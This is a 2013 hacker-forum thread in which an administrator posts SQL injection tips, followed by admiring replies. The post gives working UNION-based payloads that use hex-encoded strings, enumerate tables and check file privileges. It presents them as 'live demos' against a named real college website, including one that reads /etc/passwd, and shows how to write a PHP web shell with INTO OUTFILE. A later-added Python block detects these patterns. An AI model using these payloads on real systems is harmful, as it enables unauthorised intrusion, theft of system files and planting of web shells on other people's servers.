

SQL INJECTION TIPS



10-14-2013, 03:19 AM #1
madcodE Offline Administrator **********
Junior Administrator
Posts:501 Threads:99 Joined:Oct 2012 Reputation: 8
Mood: Devilish
Assalamualaikum.. madcodE haxor here

in this article I will give you some SQL injection tips

Tip 1: avoid use of quotes '' ""

okay when we are injecting a website and we have reached a point where we need to use a where clause and give input data
for example we are trying to find column names of table admin
we mostly use
Code:
select column_name from information_schema.tables where table_name='admin'
but it doesn't work all the time.. what to do next?

we can avoid use of quotes .. we can use hex values instead.. or convert the string to MySQL char
we use hackbar > SQL > MySQL char for it
or we can use encode options in hackbar Encoding>Hex Encoding>string to 00ff00ff
when you input the string it will look like
61646d696e we have to add 0x before it and make it like 0x61646d696e
and then add it in our query that will look like
Code:
select column_name from information_schema.tables where table_name=0x61646d696e

Tip 2: SEARCH TABLE NAMES FOR SPECIFIC COLUMN

You inject a website with a big and awkward database, you get lots of table names and you
don't know which table might contain login details
so what are you gonna do with it
usually you retrieve the table name and then move to columns to find login records
but in this case we will scan all table names for some specific column in all databases
let's say our specific column is "user"
so to find out what table name contains this column
we will use a query like
Code:
UNION SELECT table_name From Information_Schema.columns where column_name="user"
or
if it doesn't work we can hex column name (in our case, hex of passwrd is 0x75736572)
Code:
SELECT table_name From Information_Schema.columns where column_name=0x75736572
LIVE DEMO
Code:
http://svce.ac.in/departments/cse/profile/index.php?id=-7+union+select+1,concat(0x3c2f7469746c653e,group_concat(table_name))+from+information_schema.columns where column_name=0x75736572


this query will look in all databases but if you want to search in current database
you can add AND condition in query and make it look like

Code:
UNION SELECT table_name From Information_Schema.columns where column_name=hex_of_column_name and table_schema=database()




Testing if your current db user has read/write permissions

first you need to check the database user
you can find it using user()
and query will return data like [email protected], [email protected] or just user / anything



so you got the username, what's next?
how to check if the user has read/write permissions?
easy
use this query
Code:
select file_priv from mysql.user where user='username'
sometimes you need to avoid quotes and use hex instead

live demo

Code:
http://svce.ac.in/departments/cse/profile/index.php?id=-7+union+select+1,group_concat(file_priv)+from+mysql.user where user=0x637365

LIVE DEMO OF READING /etc/passwd



Code:
http://svce.ac.in/departments/cse/profile/index.php?id=-7+union+select+1,concat(0x3c2f7469746c653e,LOAD_FILE(0x2f6574632f706173737764))--


what next if you got write permissions ???
if you got write permissions we can write our shell in any writeable directories of website
but how ??
using the outfile function
but how to use it?




Code:
SELECT '' INTO OUTFILE '/var/www/dir/mad.php'

NOTE: /var/www/dir/mad.php is just an imaginary directory for this article .. you have to find root path yourself

how to access the shell?

just go to dir you provided like this

Code:
yourwebsite.com/dir/mad.php?mad=whoami




SHOUTS TO MADLEETS TEAM
1337 HAX0RLIFE MAKMAN DrZombie Haxor Hussy and the rest of team
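
For defenders, the hex-literal trick in Tip 1 and the file functions later in the post are why quote-only filters and plain keyword matching on raw logs miss these requests. The following is an added example, not part of the original post: a Python triage routine that URL-decodes a query string, decodes printable `0x...` literals, and tags the constructs this thread uses. The rule names, `inspect`, and the sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructs named in the thread; matched after URL- and hex-decoding.
RULES = {
    "union_select": re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "priv_lookup": re.compile(r"\bmysql\.user\b|\bfile_priv\b", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "file_write": re.compile(r"\binto\s+(out|dump)file\b", re.I),
}
# Whole-byte hex literal such as 0x61646d696e (MySQL reads it as a string).
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)

def decode_hex_literals(text):
    """Return the printable ASCII strings hidden in 0x... literals."""
    out = []
    for m in HEX_LITERAL.finditer(text):
        raw = bytes.fromhex(m.group(1))
        # Skip binary values (colours, ids) to limit false positives.
        if all(32 <= b < 127 for b in raw):
            out.append(raw.decode("ascii"))
    return out

def inspect(query_string):
    """Classify one raw query string: (sorted rule hits, decoded literals)."""
    decoded = unquote_plus(query_string)
    literals = decode_hex_literals(decoded)
    # Scan decoded literals as well, so a hex-encoded keyword still matches.
    haystack = decoded + " " + " ".join(literals)
    hits = sorted(name for name, rx in RULES.items() if rx.search(haystack))
    if literals:
        hits.append("hex_string_literal")
    return hits, literals

# Constructed sample query strings (no host), modelled on the thread's requests.
SAMPLES = [
    "id=42&color=0xff00ff",
    "id=-7+union+select+1,group_concat(table_name)+from+"
    "information_schema.columns+where+column_name=0x75736572",
    "id=-7+union+select+1,group_concat(file_priv)+from+mysql.user+where+user=0x637365",
    "id=-7+union+select+1,concat(0x3c2f7469746c653e,"
    "LOAD_FILE(0x2f6574632f706173737764))--",
]

if __name__ == "__main__":
    for qs in SAMPLES:
        print(inspect(qs), qs[:60])
```

Matching of this kind only triages logs; the fix for the behaviour described in the thread is parameterised queries plus a database account that does not hold the FILE privilege.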

10-14-2013, 03:24 AM #2
H4x0rl1f3 Offline Commander In Cheif *******
Administrators
Posts:1,128 Threads:25 Joined:Jun 2012 Reputation: 15
Mood: Stoned
You are awesome bro wink
Thanks for writing this awesome stuff.

Always Aspect Reward from the Creator and not anyone or anything Created.
For Complaints & Help Contact:- [email protected]
Zone-h
http://zone-h.org/archive/notifier=H4x0rL1f3
I am the orphan of Gaza & Kashmir. Ruins of Iraq,Syria & Palestine Bombarded of Pakistan,Afghanistan, Mali & Yemen Change of Libya and Egypt Discriminated of Bahrain & Turkey Freedom of Earth's paradise and Al-AQSA. I am the hunger stricken child of Somalia, Ethopia, & rest of Africa I am the suffering of each and every single corner of the world. But Listen!!! Hope is what I am!!


10-14-2013, 03:29 AM #3
Sizziling Leet Offline Any problem of iphone ipad ipod ask me ! *****
Respected
Posts:469 Threads:53 Joined:Aug 2013 Reputation: 1
Mood: None
AwesoMe Bro Biggrinsmiley






Code name : Sizziling Leet Haxor

Contact : [email protected]


Facebook
https://www.facebook.com/david.daniel.90857901 i changed my account so please bros add me there


ReGarD's Worriedsmileyhy:





10-14-2013, 03:31 AM #4
Diizzy Offline cat /etc/passwd ***
TeaM MaDLeeTs
Posts:146 Threads:5 Joined:Jul 2013 Reputation: 1
Mood: Say What
The tips are very helpful ..
Thanks for sharing with us wink

 

10-14-2013, 03:36 AM #5
Dr41DeY Offline Madleets 2017 :) ***
TeaM MaDLeeTs
Posts:285 Threads:12 Joined:Sep 2013 Reputation: 0
Mood: None
Thanks, for these tips! Biggrinsmiley

Welcome back, Madleets 2017!


10-14-2013, 11:05 AM #6
Cr4t3r Offline Junior Member **
Registered
Posts:24 Threads:6 Joined:Oct 2013 Reputation: 0
Mood: None
Amazing ! Biggrinsmiley

If you give a hacker a new toy, the first thing he'll do is take it apart to figure out how it works.
Jamie Zawinski

10-14-2013, 05:14 PM #7
sniffer Offline Bug Researchers **********
Junior Administrator
Posts:878 Threads:126 Joined:Sep 2012 Reputation: 12
Mood: Happy
AwesoMe Bro Smiley1

jabber : [email protected]

10-14-2013, 11:32 PM #8
Sn!p3r_GS Offline Super Moderator ******
Super Moderators
Posts:354 Threads:19 Joined:May 2013 Reputation: 1
Mood: Relaxed
Good tut bro thx

Islam Forever

Love & Respect to : Zombie_Ksa-H4x0rL1f3-Shadow008-b0x-1337-Invectus-??dcodE-DeXter -MakMan-MindCracker-Sniffer

http://th3mirror.com/archive/notifier=1/page=Sn!p3r_GS

11-17-2013, 12:10 PM #9
_-_ L.a.F.a.n.G.a _-_ Offline -_- ComPleX StRuCtuRe -_- ******
V.I.P
Posts:238 Threads:46 Joined:Mar 2013 Reputation: 3
Mood: None
alaaaa maddy janu :-* <3 Lub u AIna sara >Biggrinsmiley< :v

Hackers Make TooLs Not The ToolS Make HAckers (:| :-<


Add Reputation If You Like My Work.

11-17-2013, 01:26 PM #10
Ninja-Inj3ct0r Offline Junior Member **
Registered
Posts:10 Threads:3 Joined:Nov 2013 Reputation: 0
Mood: None
Gr3 post and well explained ~! . Also It was a load_file Injecting Biggrinsmiley :lol:





